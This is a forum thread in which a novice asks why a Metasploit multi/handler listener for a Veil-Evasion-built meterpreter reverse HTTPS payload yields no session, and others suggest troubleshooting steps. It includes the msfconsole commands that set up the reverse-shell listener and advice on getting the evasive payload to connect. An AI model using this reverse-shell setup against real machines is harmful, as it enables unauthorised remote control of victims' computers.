Kali Linux Metasploit Issue

[becckman]

I am very new to kali linux and this stuff, I'm watching a tutorial and mine did not really work out as the tutorial showed. So I generated a reverse meterpreter with veil evasion which i have downloaded on another machine. My msf exploit does not fucntion properly though, i don't get any sessions etc.

Expected behavior

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf exploit(multi/handler) > exploit

[] Started HTTPS reverse handler on https://10.0.2.15:8080
[] Starting the payload handler...

Current behavior

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.0.2.15:8080

Machine System

Kali Linux 2017

Metasploit version

metasploit v4.16.31-dev

 

When watching the CPU on target machine's task manager i can see that the program works, but still I get no sessions. Thanks in advance for all help.

[digininja]

Did you build the executable properly and is it pointing at your correct IP and port? Can the two machines see each other?

[becckman]

What I know of they are properly executable but they can't be as it's not working i guess. I can ping between the attacker and victim, is there any other way to see if it is correctly built or not ? 

[digininja]

Can you ping victim to attacker, that is the important route for a reverse connection.

What command are you using to build the exe?

[becckman]

Yes I can ping from the victim to the attacker, I generated the exe in Veil-Evasion. 

[digininja]

Generate your exe on the command line and make sure you pass the right parameters.

https://www.veil-framework.com/veil-command-line-usage/

Also make sure your listener is using the correct handler.

As an extra check, fire up Wireshark on both machines to watch for network traffic.

[becckman]

Not sure if it's a bug or me doing wrong as I get no errors or anything, it's just blank after "Started HTTPS reverse handler on https://10.0.2.15:8080". I might be wrong, ( I don't know much about this ) but im pretty certain the problem lays in metasploit and not in Veil ( even if I coded wrong in Veil ) as the program works, but the issue comes up in metasploit which is not really related to the veil program at first is it? 

[becckman]

Also, the exe is functioning properly I think as it is on the list of backgound proccesses on the victim machine after I start the exe. 

[digininja]

Drop wireshark or tcpdump on both machines and watch for traffic. If you see it going out then the victim is calling home but being ignored or not being seen, if you don't see the call out, the victim is broken, if you don't see the receipt on the attacker machine, the routing is broken, if you see traffic on the attacker then the listener is broken.

 

[digip]

The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system.

[becckman]

The exploit itself is not related at all to the victim and exe before the exe is opened and a session is started right? Because it is in the exploit before ican open the exe it breaks, no errrors doe just blank..

[becckman]

6 minutes ago, digip said:

The executable you created for windows, is it 32 or 64 bit? make sure it matches the victims system.

How can I see or change the bit rate when creating the exe? I know the Kali Linux machine is in 64 bit.

Edited January 22, 2018 by becckman

[Zeynalik]

Did you fix it? I have  same problem.